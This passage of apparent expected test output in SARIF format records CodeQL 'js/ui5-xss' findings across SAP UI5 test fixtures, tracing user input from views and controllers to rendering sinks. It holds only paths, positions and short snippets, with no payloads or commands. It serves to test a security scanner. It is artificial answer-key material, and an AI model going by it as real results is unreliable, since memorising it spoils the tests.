{ + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 14, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 14, + "startColumn" : 32, + "endColumn" : 50 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "352d5eac262ae765:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + }, + "region" : { + "startLine" : 14, + "startColumn" : 32, + "endColumn" : 50 + } + }, + "message" : { + "text" : 
"oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 14, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "352d5ec8b0c3bb0d:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 37 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + }, + "region" : { + "startLine" : 14, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 27, + "startColumn" : 36, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8ceecee7055f4fa2:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 25, + "endColumn" : 42 + } + }, + "message" : { + "text" : "oInput.getValue()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 17, + "endColumn" : 42 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 27, + "startColumn" : 36, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 26, + "startColumn" : 25, + "endColumn" : 42 + } + }, + "message" : 
{ + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + }, + "region" : { + "startLine" : 5, + "startColumn" : 15, + "endColumn" : 33 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "353ad97f4bff4eae:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + }, + "region" : { + "startLine" : 7, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + }, + "region" : { + "startLine" : 8, + "startColumn" : 28, + "endColumn" : 46 + } + }, + 
"message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 21, + "startColumn" : 22, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "5d5122f6c75b5d01:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 18, + "startColumn" : 20, + "endColumn" : 30 + } + }, + "message" : { + "text" : "/input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 21, + "startColumn" : 22, + "endColumn" : 32 + } + }, + "message" : { + "text" : "/input" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + }, + "region" : { + "startLine" : 18, + "startColumn" : 20, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 13, + "startColumn" : 15, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "c18df3aa119b40dc:1", + "primaryLocationStartColumnFingerprint" : "11" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 9, + "startColumn" : 13, + "endColumn" : 23 + } + }, + "message" : { + "text" : "\"value\": \"{/input}\"" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + }, + "region" : { + 
"startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 13, + "startColumn" : 15, + "endColumn" : 25 + } + }, + "message" : { + "text" : "\"content\": \"{/input}\"" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + }, + "region" : { + "startLine" : 9, + "startColumn" : 13, + "endColumn" : 23 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 50 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "74b35e217af6aa05:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 50 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + }, + "region" : { + "startLine" 
: 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 9, + "startColumn" : 5, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "9caa0f252fbe2993:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 31, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 9, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 10, + "startColumn" : 44, + "endColumn" : 49 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 32, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "output1: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 9, + "startColumn" : 5, + "endColumn" : 40 + } + }, + "message" : { + "text" : "content={/output1}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + 
"toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 17, + "startColumn" : 5, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "2963bbd458e69924:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 31, + "endColumn" : 60 + } + }, + "message" : { + "text" : "oEvent. ... Value()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 60 + } + }, + "message" : { + "text" : "sInputValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 19, + "startColumn" : 44, + "endColumn" : 55 + } + }, + "message" : { + "text" : "sInputValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + 
